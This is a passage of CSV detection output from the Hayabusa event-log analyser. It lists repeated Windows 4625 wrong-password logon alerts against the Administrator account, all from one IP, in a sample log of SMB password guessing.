NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.355 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBD0Q2szeURxMYA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KPUi2NhPP92Rs3hy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PrbMf9E0fOuwIB8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.613 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 807zsxQ9WETO9YIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGMJKRYUlmijJV40 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv33to031A0fQzX2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.753 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IT0bzycur7HXFeLg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyY2K7tT0HgQ1ZL3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6aexuFPH6FyEZ1bN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o8Iojas6sznqlYUE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U2SnliYkmx59ACSM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:19.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2plWY1GZHilHv5Vh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XIfmqihMJdPVz80p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Odg692Eyde8md0t7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gsQNvf5HkRQnbDul : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.134 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: il2DGq3bzfwGuJN4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9OsQFOcIyougrx0E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gR8wpQrGYzd4NrBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KFjRsjWXbEPs9m1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wbjudOy3rWefzAIv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Q4gc8keCTv2HeE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SmsaxHrHYuofUhAH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvhWasTJYmChfsNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DszGfEo9aua2y5UC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lZPScjxczbrcJuvJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ucpjxJV4rBXOxy4e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.636 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BmTtDfX05VsKFrON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HhWSUkQhv089RSfJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8RXCiXQYgjuPO78 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfB3u3Np38FOw6hc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I9GcSmto4jdCIw6H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HsogJdHUcldt7JeH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IUbkohKtCy6joOBY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:20.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9ZFyYxBrKnz652Co : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQ2MHr71xALFHJqN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cgjHOgEYRLQiJX75 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.092 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXLjSNCeDAaX4ttQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.137 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: np6hwdqnWLJawVn9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.180 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: adqqChrYx3lZ0BAa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1GTXkOnNYTws1MiC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QUvFvCM6AJhKjXe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NiVgC8oJ5W2Xr3t0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hXfhdrbLnNOGDqy6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcjMGbrHQHxIhSSh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LDYPTYHHKAe39GjM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.481 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2PF3H6LE6MqFjVWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LLTReOoxRa7UAhT3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jqtqwAPBiBfaHNpv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jmisFXzDpOILUhIX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W5UHqVVAYK08FWit : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKHLHN59FDnD92Sm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.829 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ohAKPRGvg1JCQ91y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pxdcrng84HEG39nJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.926 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lFGXFxHPbxDTGmiN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:21.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tyFnafBgzoLQWTQR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.024 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2IjLjxkd2pX4moFy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9vqYC4KotCYTcQv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qtHcYFIOHglQFb60 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mmiHIQrpsAVRJtdb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4TdkChjMAviJ6jr8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.283 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPIGU1rBk0F5cG9P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ScynGWKK3CtoUsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0E4JAuxC8MuuGfnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4aDJtqsUWKyuDqBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yCFrEHUgqCtKPybS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ftrEBfaLGbboV8D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: thle3slH6gZYllyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PcEnabS7oj98WI0e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EBqGp9CD4A9PsyLk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iil8dQlzMCkKRNUb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nDBqxF9bmNNjNdsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QJNBRV3BRVEN8hmG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.837 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OGl1Tbdw7PDvVsRR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uspHTc4JwnjjZQti : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:52:22.930 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Exq3nfy1LeFOPcA : IP Address: 192.168.198.149 : AuthPackage: 